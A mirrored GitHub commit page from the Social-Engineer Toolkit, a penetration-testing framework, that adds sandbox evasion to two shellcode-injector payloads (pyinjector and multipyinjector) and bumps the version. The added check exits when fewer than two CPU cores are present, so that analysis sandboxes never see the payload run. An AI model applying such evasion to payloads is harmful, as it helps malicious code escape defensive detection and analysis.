mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-02-17 05:48:46 +00:00
Update to add sandbox detection in payloads
This commit is contained in:
parent
7e33b55ab3
commit
6d445d3417
6 changed files with 17 additions and 1 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 6.3.2
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* rewrote pyinjector and multipyinjector to evade sandbox technologies
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.3.1
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -230,7 +230,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '6.3.1'
|
||||
define_version = '6.3.2'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
|
Binary file not shown.
|
@ -18,6 +18,10 @@ from Crypto.Cipher import AES
|
|||
import multiprocessing
|
||||
import threading
|
||||
|
||||
# added sandbox evasion here - most sandboxes use only 1 core
|
||||
if multiprocessing.cpu_count() < 2:
|
||||
exit()
|
||||
|
||||
# define our shellcode injection code through ctypes
|
||||
def injection(sc):
|
||||
sc = sc.decode("string_escape")
|
||||
|
|
Binary file not shown.
|
@ -1,12 +1,18 @@
|
|||
#!/usr/bin/python
|
||||
import ctypes
|
||||
import sys
|
||||
import multiprocessing
|
||||
|
||||
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
|
||||
# Injects shellcode into memory through Python and ctypes
|
||||
#
|
||||
# Initial awesome code and credit found here:
|
||||
# http://www.debasish.in/2012_04_01_archive.html
|
||||
|
||||
# added sandbox evasion here - most sandboxes use only 1 core
|
||||
if multiprocessing.cpu_count() < 2:
|
||||
exit()
|
||||
|
||||
# see if we specified shellcode
|
||||
try:
|
||||
sc = sys.argv[1]
|
||||
|
|
Loading…
Add table
Reference in a new issue